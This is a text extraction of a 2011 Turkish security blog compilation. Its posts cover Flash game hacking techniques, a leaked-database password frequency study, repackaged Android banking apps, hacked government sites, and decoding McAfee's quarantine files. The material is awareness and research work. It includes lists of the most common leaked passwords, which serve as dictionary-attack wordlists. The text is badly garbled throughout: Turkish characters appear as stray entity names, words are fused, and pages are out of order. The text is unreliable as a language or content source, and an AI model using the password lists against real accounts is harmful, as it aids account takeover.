ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 31: Hack 4 Career - 2011

31

Benzer sorun diğer ticari web uygulaması guumlvenlik tarayıcılarında var mı diyerek Netsparker ve Acunetix araccedillarına baktığımda bununAppscane oumlzguuml bir sorun olduğu ve bunun yanında başka bir sorun daha dikkatimi ccedilekti Misal ekran goumlruumlntuumllerinde yer alan JSklasoumlruumlnuumln aslında geccedilerli var olan bir klasoumlr olmamasına rağmen Appscan ve Acunetix araccedilları Netsparkerın aksine site haritalarınavar olmayan klasoumlrleri ekleyerek goumlruumlntuuml kirliliği yaratmakta ve site haritasının kullanımını zorlaştırmaktalar

Sonuccedil olarak sitenizin bu tuumlr otomatik araccedillar ile taranmasından rahatsız oluyorsanız bu araccedilları inceleyerek zayıf noktalarını keşfedebilirve site keşfini zorlaştıracak basit numaralara ile script kiddieleri canlarından bezdirebilirsiniz )

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi haftasonları dilerim

Not Uumlretilen bağlantı adreslerine benim yaptığım gibi isim (link text) vermez iseniz kullanıcıların yanlışlıkla bu bağlantı adreslerinetıklamasını engelleyebilirsiniz

Devletrsquoin Sitesi DenizhellipSource httpswwwmertsaricacomdevletin-sitesi-denizBy MS on February 20th 2011

Bilenleriniz bilirler geccediltiğimiz ay Bilgi Teknolojileri ve İletişim Kurumu (BTK) ve TUumlBİTAKın kurum ve kuruluşların bilgisistemlerine youmlnelik siber saldırılara karşı savunma guumlcuumlnuuml tespit etmek iccedilin Ulusal Siber Guumlvenlik Tatbikatı duumlzenledi ve 4guumln boyunca suumlren bu tatbikatta BTK ve TUumlBİTAK tarafından oluşturulan ekip 41 kamu ve oumlzel sektoumlr kurumkuruluşunun bilgisistemlerine gerccedilek saldırılar duumlzenledi

Bir yanda ulusal siber guumlvenlik tatbikatı duumlzenlene dursun diğer yanda vatandaşlarımızın her guumln ziyaret ettiği ve bilgi paylaşımındabulunduğu honeypot gibi kurulan ve youmlnetilen onlarca devlet sitesi art niyetli kişiler tarafından gerccedilek saldırılara maruz kalmakta vebu sitelersistemler uumlzerinde saklanan veriler art niyetli kişilerin eline geccedilmektedir

Duumlnya genelinde hack edilen sitelerin arşivini (kendilerine bildirilmesi kaydıyla) tutan Zone-H sitesine goumlz atacak olursanız kimi zamanguumlnde onlarca govtr uzantılı devlet sitemizin hack edildiğini goumlrebilirsiniz Zaman zaman bu siteye goumlz atan biri olarak geccediltiğimiz ayEnerji ve Tabii Kaynaklar Bakanlığına ait olan wwwenerjigovtr sitesinin youmlnetici panelinin hack edildiğine dair bir giriş goumlrduumlm veduyarlı bir vatandaş olarak 24 Ocak tarihinde hemen TR-BOME ekibine (bilgisayar olaylarına muumldahale ekibi) web siteleri uumlzerinden

32

durumu bildirdim Olayın en kısa suumlrede ccediloumlzuumllmesi iccedilin Enerji ve Tabii Kaynaklar Bakanlığı ile iletişime geccedilmek yerine TR-BOMEile iletişime geccedilmeyi tercih etmeme rağmen halen youmlnetici panelinin internete accedilık ve erişilebilir olmasının bir vatandaş olarak beniuumlzduumlğuumlnuuml soumlylemek isterim

Zone-H sitesi uumlzerinden elde ettiğim bilgiler ışığında hack edilen devlet sitelerimiz ile ilgili istatistiki bilgileri bir araya getirecekolursam

bull 10032010 - 16022011 Zone-He bildirilmiş hack edilen devlet sitelerinin sayısı 1250

bull 2010 yılının Mart ayında 50 Nisan ayında 72 Mayıs ayında 396 Haziran ayında 67 Temmuz ayında 86 Ağustoz ayında 77 Eyluumll ayında 118 Ekim ayında 72 Kasım ayında 59 Aralık ayında 85 devlet sitesi hack edilmiş

bull 2011 yılının Ocak ayında 88 ve Şubat ayının yarısında ise 80 devlet sitesi hack edilmiş

bull Hack edilen 1250 devlet sitesinden 536 tanesi Linux 320 tanesi Windows 2003 333 tanesi Windows 2008 31 tanesi Windows2000 7 tanesi Unix işletim sistemi uumlzerinde barındırılıyormuş

Boumlyle vahim bir tablo karşısında devletin kendi kaynakları ile (Tuumlbitak) sitelerini iccedil ve dış tehditlere karşı acil olarak denetlemesigerekirken geccediltiğimiz ay Bankacılık Duumlzenleme ve Denetleme Kurumu (BDDK) 49 bankadan Tuumlbitaka 6 ay iccedilinde sızma testiyaptırmasını talep etti Bir yanda honeypot haline gelmiş devlet sitelerinin iccediller acısı hali diğer bir yanda guumlvenlik kontrollerinin ccedilok sıkıolduğu ve senede bir ccedilok defa iccedil ve dış guumlvenlik denetimlerinden geccedilen bankaların ilave olarak devlet kaynakları ile de denetlenmesiyorumu sizlere bırakıyorum

Bir sonraki yazıda goumlruumlşmek dileğiyle

Virusscan BUP Restore UtilitySource httpswwwmertsaricacomvirusscan-bup-restore-utilityBy MS on February 12th 2011

Bana goumlre korsanların (konumuz her zamanki gibi etik olanlar) başarılı olabilmeleri iccedilin yuumlksek hayal guumlcuumlne ve yaratıcı zekaya sahipolmaları gerekmektedir Karşılaştıkları engelleri aşmak ve başarıya ulaşmak iccedilin uumlretecekleri senaryolar hayal guumlccedilleri ile bu senaryolarıhayata geccedilirmeleri ise yaratıcılıkları ile muumlmkuumln olabilmektedir Nedense hayal guumlcuuml ile zafiyet keşfetme becerisini yaratıcılık ile iseprogramlama becerisini oumlrtuumlştuumlrmuumlşuumlmduumlr ve bu yuumlzden etik bir korsan olarak bu becerilerimi geliştirmek iccedilin zaman zaman senaryolaruumlreti zaman zamanda karşıma ccedilıkan fırsatları değerlendirmeye ccedilalışırım

Yine guumlnlerden bir guumln şuumlpheli bir duruma karşı kullanıcılardan gelen antivirus alarmlarına goumlz atarken kullanıcılardan gelen fazlasayıda alarm dikkatimi ccedilekti Zararlı yazılım analizinden oldukccedila keyif alan kahramanımız Mert fırsat bu fırsat Jedi duyuları ile hareketederek alarmların kaynağını aramaya koyuldu ve alarmların arkasında bu kullanıcıların ortak olarak ziyaret ettiği bir web sitesi olduğuanlaşıldı Web sitesini ziyaret eden kahramanımızın antivirus programı da aynı alarmı verince dosya uumlzerinde detaylı bir analiz yaptıktandurumun yanlış alarmdan (false positive) ibaret olduğunu anladı ve adli bilişim analizi yapma hevesi kursağında kaldı

Peki ya durum biraz daha farklı olsaydı Kahramanımızın kullandığı antivirus yazılımı Mcafee Virusscan olsaydı ve Virusscan tespitettiği zararlı yazılımları karantinaya alıyor olsaydı ayrıca kahramanımızın antivirus uumlzerindeki yetkileri (dosyayı karantinadan ccedilıkarmayetkisi) kısıtlı olsaydı bu durumda ne yapması gerekirdi

Antivirus sistemini youmlneten kişiden ilgili dosyayı restore etmesini ve analiz iccedilin kendisine iletmesini talep edebilir (e-posta ve telefontrafiği) veya sanal makine iccedilindeki işletim sistemine Virusscan kurabilir ve onun uumlzerinde restore edebilir (oumllme eşeğim oumllme) veyakarantina mekanizmasının nasıl ccedilalıştığını tersine muumlhendislik ile ccediloumlzerek bunu otomatize hale getiren bir araccedil hazırlayabilir (bildiğimkararıyla piyasada boumlyle bir araccedil yok veya ben aradığım zaman yoktu) ve yeri geldiğinde bunu adli bilişim analizlerinde kullanılabilirdi(hedef diskten karantinaya alınmış dosyaları kopyalamak ve incelemek size guumlzel ipuccedilları verebilir şayet analize elverişli biccedilimde disklesaklanmış ise)

Karantina işleminin nasıl yapıldığından kısaca bahsedece olursak Virusscan karantinaya aldığı dosyayı CQUARANTINE klasoumlruumlnefarklı bir ad altında kopyalamakta ve uzantı olarak BUP kullanmaktadır (Oumlrnek 7db11a1031283c50bup) Karantinaya alınanbir dosyayı herhangi bir hex editoumlruuml ile inceleyecek olursanız iccedileriğin ve dosya boyutunun orjinalinden farklı olduğunu anlamlıkarakterlerden oluşan diziler (string) ortadan kaybolmuş olduğunu goumlrebilirsiniz

33

Karantina mekanizmasının nasıl ccedilalıştığını hızlıca anlamaya ccedilalıştığımda karantinaya alınan ve BUP uzantısı ile saklanan dosyanın j(hex 6A) karakteri ile XOR işleminden geccedilirildiğini anlamam ccedilok zor olmadı

34

Hex Workshop ile karantinaya alınmış dosyayı 6A ile XOR işleminden geccedilirdikten sonra ortaya anlamlı karakterler oluşan dizilerccedilıkıverdi

35

Orjinal dosya ile XOR işleminden geccedilirilmiş dosyayı karşılaştırdığımda XORlanmış dosyanın ilk 2560 baytında detaylı bilgiler (orjinaldosyanın adı karantinaya alınma tarihi virusun adı vs) saklandığını goumlrduumlm Daha sonrasında ise programın orjinali saklanıyordu(Tam olarak orjinali diyemiyorum ccediluumlnkuuml her 65536 baytta bir 512 bayt buumlyuumlkluumlğuumlnde ccediloumlp veri araya (junk) sokuşturulmuş ve bunlarıayıklamam gerekti)

Hem detaylı bilgileri goumlsteren hem de karantinaya alınmış olan dosyayı orjinal haline ccedileviren bir program hazırlamak iccedilin işekoyulduğumda ortaya bup_recoverypy aracı ccedilıktı

36

Program iki komut (restore ve view) ile ccedilalışıyor ve kullanımı yine ccedilok basit İlk olarak yapmanız gereken karantinaya alınmış dosya ilebup_recoverypy programını aynı klasoumlre kopyalamanız Restore komutu ile hem detaylı bilgileri goumlrebilir hem de karantinaya alınmışprogramı orjinal haline ccedilevirebilirsiniz View komutu ile sadece detaylı bilgileri goumlrebilirsiniz

Oumlrnek bup_recoverypy restore 7db11a1031283c50bup

Programı buradan indirebilirsiniz

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese iyi hafta sonları dilerim

Not Zaman zaman senaryolarımda Mcafee antivirus yazılımına yer veriyor olmamın nedeni uzun yıllarca kullanmış olmamdır başkabir nedeni yoktur )

Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini 